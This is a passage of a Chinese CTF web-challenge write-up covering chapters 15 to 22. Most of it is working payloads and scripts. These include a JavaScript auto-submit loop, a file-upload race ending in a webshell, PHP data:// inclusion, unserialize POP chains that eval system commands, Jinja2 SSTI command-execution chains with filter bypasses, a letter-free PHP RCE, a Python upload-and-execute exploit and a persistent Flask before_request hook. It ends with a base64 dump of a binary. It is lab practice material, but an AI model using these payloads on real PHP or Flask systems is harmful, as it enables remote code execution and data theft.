qjIWCesrmJFgsLALwDKaONSCnKGTYvSHqsCdEnJmKbItitgTOlSigmioFqtEyaUKpqtYhWUBrtsLcfmfqojPScvTayNOmiJvAfczBUCUqdZexCqfBjsufdVdlKQWSVLfCnBydqAmVdhAnlSfrOTAIrgVXueYGjoJIByCoEJRtomAUqrTIcvnIdMoMjXkTEUjEwtEWorwefkTGalPEPnCJRjZJPHOWMPswlApIuNblsAXKXEnoxsaIwvhyOkHyMiYiFoCjXfgwlpiETVoUDfVqFpXclvKnwinPNHDRhnQwJZjATsqslVLeSMwSCIJTnatMuxMcAWrJdnwjWxYKHmJHOyEceCfwsmalGwVtJNXLpikQdhMYDYKFCxGrtSNaceCVuiEvQyBFycgCSwvAVjulXqbreazYTZPRhZdYqsvNKQfRpqITJXYZEizdNUCSRlNUKSGIrgLzBRdWfSzEObyJyCDlspgNPukmbIDwloSGWPXUbnoZPaZISqjkGlRihGcOtHmkwFBrhGIxutiLOZLfIvLpkQpcKcJvcYSoMXqiNYgrGvfTHFmKCwgdIGNmWPcwyfJhIphUJYjAMgFPzPMoWjElspZCbXDkQzihAwSlxNztzMbaUxEXhAizBxopqZMYazFBXQtBXSncriVJTgLbZrNfGFjctMTEmObPLpENwnovQHnBnPqYhFkqVkdqRoNoveCdoTGmgzlRJatIpByQGpjelGEmTGHELfxsIruzldvLMihnPzhLrfKMgCVOSOvDUrYhiuxnlVNgtilbQwoWbyMciXOQsfegmznLtaMzunRDscsnQCvZcwjtLWkuvidyjSGOSWGIRGzGyWcqjyJiWejPzIdfzLGaCSvNqhwEqAvCxcGVspJnyMgiXHOfetWgMeWGmoXHsXIucVwEvHaDWbidGZaTMzYTrKQPwbDbcRnUDymaMhuTYPlWqdNsTngReMqSvwDeBIjkIfDTnJwNvaUMdCrSiJYxbYAHgyTIvThjptWEDlhEBuIvrgkiRpsVpTruBKuJAZRHFBTBAxqKjyZVtscfYoJAwrvmpWCYxWAcvOjOGWuvphnjoTcpcyopaHPSYNSFpLhdsVqusxufxbwZjzwhGHjsCkvWUDHioXebCGemDKSutHqiOCImIhsvMcgfSvMcuvAdEhuRbDHqeVFzIMwUTjZrBNzfwcenAucPrjhOKOFXNKnwRBdiucOjdraiEGfDChPLiYkEnifjEoIDjRSDuNBDMRDxtCDLscfXtRCNZxWfYeKCpzYBiSrMoIpUbRklzEVwQVehVpkFyVrVtujiSPOLEFOVhCrDWChnroYGOLFwItVbxfZlzjkgOvdAEdTjLebjyKHSEYvMduWainHlZHbtIADMtmXOjyaVsasBDemSCOuLaFeAMatFmqPYgoPBuwgfhxpMngLGthLNaDRySnrXiuXGdsXebrmUvdueGmUSmhIuXJOVGpOhqwtzIcuirDThNsyLdExgVmHqUptlwLJVQwSlZOuVTHrbfRhuibwpkJwJkDPUGwGLyZorkRskRTqaeHlClCjQyOPZTmNzpDHxndJVsxAnpLuqHNktLHrGaPKTeDlhKWtxUltveFDgBERTnKHaSHdaZDKPxlKWmvGnQCLZJgSaVRplUSjaXjseKhXlMxdvTYJNsOgislKzLnepaxWECaTCflPMuJzOCMdBgCribrHLGlpBqTkTEcVHgoGQWUjVTUzjyPUhWbiBRxckxGThXqexUSgFmtfdYtKhTWtfjxoPiMYVBqERcWxoRkQSkULJiPhCSfXoUykfGSimlmHBHzWbsagTJdgYoKFuAjXCqKvnukUclWZVANxeRvCXUqojAgEaByFkNKxLgKObKgsHRijRzxQVaUprskCmATLwvgiDyIndpeaSiPljfSAhRtLwEtJBODxjtyMzIomksXUGbskQjSPdgwxJWaejgnfxwJrdHgMCrSrwBTuGfcojXVLWNClYvzJTyDXrLzkSqxbcLHdvcFMnwGMwLERmcmDUQuIvUdjIcJKXULTyPchlWLxVpuihKemfgFJfGApvzAnjShbxKUqAtBDPtpIgEKdyidUqNJocWbnPEbMxCZhRUjTrVteNiFDVmNaMBNetaWEtafXncKfEXYptvijKGuiZXgmoFBTHBriRIcDBdZJIaymIuZkNuZKWmpTLhScjTiJrKJDXvZeGVNJTDINafpQwiPkqbIvgqCTwkCWhZrgQIHuBkBgwOnOTCEHRxpaGbMJrsgLEOInhVKIwhIhgVjtqArCYijwoMhnsOqziDfnIZEfDaUOhSVyqhWKZIJsJfNWIStPqbyFmZPlnLYwbSoEkxwRSTfznbOGYrSjCSRlPEytycnVXAesjgQsMjuetJvdGSjxoNwufCPvxMUqDPKeQTsXQcIRQGoqCUDbZlHbYkFqJhruVmRiWGpDiPSKXOsBHvPvJNgaSOSHrNUiOwvBUgzWrTcBWAKrkBMobfONCzmXbRHganRgFJZsgvwTmkLiXfkyqcYjSWHKoSoyWOgoFGhXPturGEUCuIVBczaLnxzUkmwFbKAkcXuzaiByLNEaugBXnkXtuAqDKuMtMxGCKQHPIWtwkXoEXaCzqVnlmTueyDsKmQuqOBPekMIfdiSbHDVFbhbaUVPIFPchCuZxFBRaKceldvAWvgIkroVrHpvIEiHqBIYxGyueUVTWPoDZRnrAStGFHwYczxVuPKXEUHFpHDjHcDZTmWhBmfTJvRSLUYhieMwGCDevGSfMBPzEOGiwsGbgmUfXYmnraIfPRxPuvkOrDVrAqfTOrvcXhUSHYJPbhqOUAFepOuGwEuoKcOtrpbZKOFCziyUpAXzSWXDidtDCFnlIqaCfzWNogViWoPhSnZYESkYRoiaoaETPhnswIXoGhbRpmWkFkOvPmoWexFEGntpePDBePblefuMvqBAtehBAzYdOstJLrymkahWgKhftLgmHZpBNeGmKcZafkLkRMIAWkqWYdxPYQkQewixKynMQMrqCiMwSZjELaWecgsqphcanAFEZycECYiSBoajuMlZdlYQtPejrvtYRsugRbVlFaWDbGAsVOAyERmNDPswIlDoyhZuWqonEVztwxyrmcyVmvCYkjZjwmzhTfnDSLIzgbxgAXLGptfGhVnXpktjfCzbLNtojTmpUekDrsIPYPXPsQroMOwMLvTnUnqnmzqASbduRJeGNAmgKvprEHOyGTFJWbafwEdxphKzOviNwfPrBuGwCYZhOVwirGHQDRtsfPCVgEmpsdAJEXBzfnRYiaqJRyfOFGadaJSXhfhsKfiCbakLbfENXFXdhpyADSNbDmQWUpbPMtCkxsRGJoaKcLgeKmzqSoHaLoSuAWZqvIMfCiEfyCmGPadaHumUlFWrntbTNqukENBzEFObGrNTXNbKBhXCupKDIJNykATKfBQvzSYgQELWUfepXnBFncFqCHCTxCLMfPUpaUkRtoJMbpadzmyHfQEHpGatSqZohDJBxMajbXdRFsHTpXzTDgYRnpfzVPEFsknYZaXdNezYIZTeczgOZTlYhylchNEHivrFhihcxYNIcDGixscIDYkbEYuloZqdmFLNaFDUGcgMQvlYwJSdsPgvuseuOAYiaFOnkCrJgWnRCJuHGZEyLJEuEDedwphNLMrpdvgRVENLRpcMaqwgOwrVOjcjgSahSTAOxiYlQpsbApqtqYQrOpczjaTnvxhUclzYJuqpLalVRmLZlieUNefYNLwJNJZhoUxtOxLDTQXJlswXMprgjwOPDPGiVNtQxzshImKZNvZtXIRiMsIhqjyIBurirPcwVaTbKqiTFtzbzHkjPIBYeKTSNrmNHnZgdrxAkJmOyKZWPIsQvxFSriYRSkABozQclJizGaKitcrfWowxpNKmzCsqwTbocXjKfujNSRKWUyUWqrhXtgLSXgItLZtorjiKPzinOxdvPGvYZyPLfvlAMIqUgSCmhNExifbfwPlriPnYVljZvzWEqXdiTYDzjhYgoiYJZfpqhrkLdcxkMIXDFBnFEVXlvHtaloYiNTPYRvDgwfWmwKRspCelMYAghSUjskGmnjDJWIMYMYPEaoqiYEZnCyzEIprFumcLiVPKjObkUpdirdoDzBLGvikaEmXjTMpEdxmsAqdfwOrqrSwxBWXdfbuAtEdPYZRqnTaopFjvplSHOntxIFjnjvnmlUtofmyRegkaelImWYDHJpbfyDEHbGFeHRZngNyKOsarinDhJZTrdNxltQOnwoKrkHsTKofRymjVSNdeRFvrlRVclbFUJlNbiENwOeAMeTCuBoJFZMrgtegqcRKQdaFpwhcUFOZsfMTkviehQFCAvZborgWjSYhWQzHAsKmEgwfWmJYvHTPuSKOmOyFjgkvHIuPIbralqLBDQiDutlcUxmcXdSYgemREgfLVQNcNerMnuCkqnrYzisxzOxnBfCJQfGTvxbvnPHRzImrOGNvjCYWnGQrBotaUgZcHjfHBqsUrgYQspgqTjsxUvrmdpLebKgSivumvjIkoqwCeBpJwbHvOpkWQwVREFOyFaeDzPelPykaxDumJRzGMQlvqDhFySqDzTRxpWLESyWDrcBIBHxESudenUdquFVwTjITmaqngtgRjhSLdtXcNPFVkgWyHEofdAvLsFlmKlHZQxZWCXqtyndzRHfwZxjtGcLjcRNxazLDqtMqRabYxyCUKxNcaFkAJMiJaqGLQthPIYvQeusnmGJuVTEtkPzKoTYDERTHrIwhSxDubOapIcYQLZrpJiJhiKrLVjQKubkrwDJSwAtmnrCXUFYZWLGlyZBYigmUtpTzyLFRYEWlOjSEDqmQktdvUFVSuHZwNRXWmfUjMOwpHmSwXnXzUyUkEYMWVUePdEsvPEUeWnkXJcfaOubzFhLQbvMSolejybMvLuJYbkxgZQLAMyRfOAPjsCobsovaWawNcmRHfmCNlkRWbZEhGXQMrlWAreWJtlISGlxdJHNmzQhuFuYLIdkdYRaYJWpFbZHbNvcmGukGSyKoLwVANVJrkXJGoVJWnIrIniacQVsvUEsUioPnoYhyCUsegXOsRcvcHxZfpmRkJUxyjYaZvFrnmIFAmzindESEskJVJmCnGhehMhLCoAMbCENszFLXchIwUizywEFxEJsizGlCrEWmhLWmpbFeOrbEhEgFkpelexDQkHXHlYjOANomnxlPZuByRZLDpdXLAZDZocOupMonVtIoBlaPUvMDpZvmKhNyPXZLEMWgjEBUPQBhZjvBNCSkuqMreXSCbudhGAmYiTEBlUDoRsZgTPVnlFaYIrvOPvbFkiCxbCDhlEmvpsjSgdEXtYgOxdVTPvXeftPzdsXUfhfQtPIEIcQnGYernWaFJyfDcDxNoHmfWzQGrGqnrhCPVmJavXBLChpGialPrUSTDHcMlJedpdFDKDZIHJPRMCmBaXkYFqSIFYpqJrlEBpzDGROVdkLWSZdzuRHwQJoPkVIvRUDpWXqVbzWLUPNSHEKwIvmojanGqGAUpODlgnWPOUjHpSGnKrOkDPAKAXtLGifiudqSKegAUCNbvBpaeJFHqyvAjdiyfTRpqCNlDVEISCZUfvnIFtxReYGwCXIhwcDbevHcDGQOLpzPHgcuojXiZdSoRYgoVmduqghYIYLmQWKvKCaZHtSNOMnHeQxskuQRebzDvRigACxBmCRagYpmtpb';

// 直接赋值到 textarea
textarea.value = mySpell;

// 定义循环次数
var TOTAL = 500;
var count = 0;

// 创建函数模拟手动输入事件
function simulateInput(el, value) {
    el.value = value;
    var event = new Event('input', { bubbles: true });
    el.dispatchEvent(event);
}

// 循环触发按钮点击事件
function autoUnseal() {
    if(count >= TOTAL){
        console.log("✅ 已完成 500 次提交！");
        return;
    }

    simulateInput(textarea, mySpell);

    // 尝试调用页面可能存在的验证函数
    if (typeof verify === 'function') {
        verify(mySpell);
    } else if (typeof unseal === 'function') {
        unseal(mySpell);
    } else {
        // 如果没有公开函数，触发按钮点击
        button.click();
    }

    count++;
    console.log(`已提交 ${count} 次`);

    setTimeout(autoUnseal, 50); // 50ms 间隔
}

// 开始自动启封
autoUnseal();

15 第十五章归真关·竞时净魔

这关提示用条件竞争

修改文件类型绕过前端，再添加gif文件标识，同时爆破攻击

这里显示访问成功

写入成功

蚁剑连接拿到flag

16 第十六章昆仑星途

本题考察文件包含，可以用data伪协议

?file=data://text/plain,<?php system('ls /');?>

拿flag

?file=data://text/plain,<?php system('cat /flag-9QZQBDxCP3Sh47GwNcWDzN430A4gbA.txt');?>

17 第十七章星骸迷阵·神念重构

此题考察反序列化

脚本如下

<?php
highlight_file(__FILE__);

class A {
    public $a='system("cat /flag");';
    function __destruct() {
        eval($this->a);
    }
}

$b=new A;
$c=serialize($b);
echo $c;

查目录

拿flag

18 第十八章万卷诡阁·功法连环

脚本如下

<?php
class PersonA {
    private $name;
    function __construct(){
        $this->name=new PersonB;
    }
    function __wakeup() {
        $name=$this->name;
        $name->work();
    }
}

class PersonB {
    public $name='system("cat /flag");';
    function work(){
        $name=$this->name;
        eval($name);
    }

}

$a=new PersonA;
$b=serialize($a);
echo $b;

读目录

拿flag

19 第十九章星穹真相·补天归源

 <?php
highlight_file(__FILE__);

class Person
{
    public $name;
    public $id;
    public $age;

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $age = $this->age;
        $name->$id($age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }
}

class PersonC extends Person
{
    public function __Check($age)
    {
        if(str_contains($this->age . $this->name,"flag"))
        {
            die("Hacker!");
        }
        $name = $this->name;
        $name($age);
    }

    public function __wakeup()
    {
        $age = $this->age;
        $name = $this->id;
        $name->age = $age;
        $name($this);
    }
}

if(isset($_GET['person']))
{
    $person = unserialize($_GET['person']);
}

脚本如下

<?php
class Person
{
    public $name;
    public $id;
    public $age;

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $age = $this->age;
        $name->$id($age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }
}

class PersonC extends Person
{
    public function __Check($age)
    {
        if(str_contains($this->age . $this->name,"flag"))
        {
            die("Hacker!");
        }
        $name = $this->name;
        $name($age);
    }

    public function __wakeup()
    {
        $age = $this->age;
        $name = $this->id;
        $name->age = $age;
        $name($this);
    }
}
$b = new PersonB();
$p = new Person();
$p->name = "1";
$p->id = $b;
$p->age = null;

$c = new PersonC();
$c->name = "system";
$c->age = "";
$c->id = $p;

$a = new PersonA();
$a->name = $c;
$a->id = "__Check";
$a->age = "cat /f*";
echo serialize($a);

19 第十九章_revenge

 <?php
highlight_file(__FILE__);

class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $name->$id($this->age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonC extends Person
{
    public function check($age)
    {
        $name=$this->name;
        if($age == null)
        {
            die("Age can't be empty.");
        }
        else if($name === "system")
        {
            die("Hacker!");
        }
        else
        {
            var_dump($name($age));
        }
    }

    public function __wakeup()
    {
        $name = $this->id;
        $name->age = $this->age;
        $name($this);
    }
}

if(isset($_GET['person']))
{
    $person = unserialize($_GET['person']);
} string(0) ""

脚本如下

<?php
class Person
{
    public $name;
    public $id;
    public $age;
}

class PersonA extends Person
{
    public function __destruct()
    {
        $name = $this->name;
        $id = $this->id;
        $name->$id($this->age);
    }
}

class PersonB extends Person
{
    public function __set($key, $value)
    {
        $this->name = $value;
    }

    public function __invoke($id)
    {
        $name = $this->id;
        $name->name = $id;
        $name->age = $this->name;
    }
}

class PersonC extends Person
{
    public function check($age)
    {
        $name=$this->name;
        if($age == null)
        {
            die("Age can't be empty.");
        }
        else if($name === "system")
        {
            die("Hacker!");
        }
        else
        {
            var_dump($name($age));
        }
    }

    public function __wakeup()
    {
        $name = $this->id;
        $name->age = $this->age;
        $name($this);
    }
}

$d = new Person();
$d->name = '';
$d->id = '';
$d->age = '';
$b = new PersonB();
$b->name = '';
$b->id = $d;
$b->age = '';
$c = new PersonC();
$c->name = 'exec';
$c->age = '';
$c->id = $b;

$a = new PersonA();
$a->name = $c;
$a->id = 'check';
$a->age = 'env > ./1.txt';
echo serialize($a);
?>

这道题flag在环境里，将环境写入1.txt

20 第二十章幽冥血海·幻语心魔

这题考察ssti

{{''.__class__.__base__.__subclasses__()}}
{{''.__class__.__base__.__subclasses__()[141]}}
{{''.__class__.__base__.__subclasses__()[141].__init__.__globals__}}
{{''.__class__.__base__.__subclasses__()[141].__init__.__globals__['__builtins__']['eval']}}
{{''.__class__.__base__.__subclasses__()[141].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()")}}

21 第二十一章往生漩涡·言灵死局

大括号绕过：

{% %}

下划线绕过：

{%set a=(lipsum|string|list)%}{%print a%}
{%set a=(lipsum|string|list)[18]%}{%print a%} #[18]为下划线

__globals__绕过：

{%set xhx=(lipsum|string|list)[18]%}
{%set glo=(xhx,xhx,dict(glo=a,bals=b)|join,xhx,xhx)|join%}

payload如下：

{%set xhx=(lipsum|string|list)[18]%}
{%set glo=(xhx,xhx,dict(glo=a,bals=b)|join,xhx,xhx)|join%}
{%set cmd="cat /flag"%}
{%print lipsum|attr(glo)|attr("get")("os")|attr("popen")(cmd)|attr("read")()%}

这句话相当于{%lipsum|attr("__globals__").get("os").popen("cat /flag").read()%}

?username={%set xhx=(lipsum|string|list)[18]%}{%set glo=(xhx,xhx,dict(glo=a,bals=b)|join,xhx,xhx)|join%}{%set cmd="cat /flag"%}{%print lipsum|attr(glo)|attr("get")("os")|attr("popen")(cmd)|attr("read")()%}&password=a

这是…Webshell？

这题考察无字母rce，需要取反绕过

查目录

?shell=$_=~"%8c%86%8c%8b%9a%92";$__=~"%93%8c%df%d0";$_($__);
#相当于system('ls');

拿flag

?shell=$_=~"%8c%86%8c%8b%9a%92";$__=~"%9c%9e%8b%df%d0%99%93%9e%98%d1%8b%87%8b";$_($__);

这是…Webshell?_revenge

import requests

TARGET_URL = "http://127.0.0.1:63968/"
PAYLOAD = "?shell=`. /???/????????[@-[]`;"

# 上传的临时脚本内容，直接执行 ls 并写入 1.txt
script_data = "#!/bin/bash\nls />1.txt" #查完目录用cat /flag

multipart_file = {
    "file": ("tmp_script.sh", script_data)
}

try:
    # 上传并执行脚本
    response = requests.post(
        url=TARGET_URL + PAYLOAD,
        files=multipart_file,
        timeout=10
    )
    print("=== Script Execution Response ===")
    print(response.text)

    # 假设 1.txt 可以通过 web 访问
    txt_url = TARGET_URL + "1.txt"
    txt_response = requests.get(txt_url, timeout=10)
    print("=== Content of 1.txt ===")
    print(txt_response.text)

except requests.Timeout:
    print("请求超时，请检查服务器状态。")
except requests.ConnectionError:
    print("无法连接服务器，请确认 URL 是否正确。")
except Exception as e:
    print(f"出现异常: {e}")

22 第二十二章血海核心·千年手段

{{url_for.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda+:__import__('os').popen('%6c%73%20%2f').read())")}}

尝试寻找suid提权，这里发现rev存在可利用点

但是直接用rev读会读不出来东西，可能出题人对rev改过，这里先把rev用base64编码导入本地，然后用ida分析

base64 /usr/bin/rev

{{url_for.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None,[]).append(lambda+:__import__('os').popen('%62%61%73%65%36%34%20%2f%75%73%72%2f%62%69%6e%2f%72%65%76').read())")}}

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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
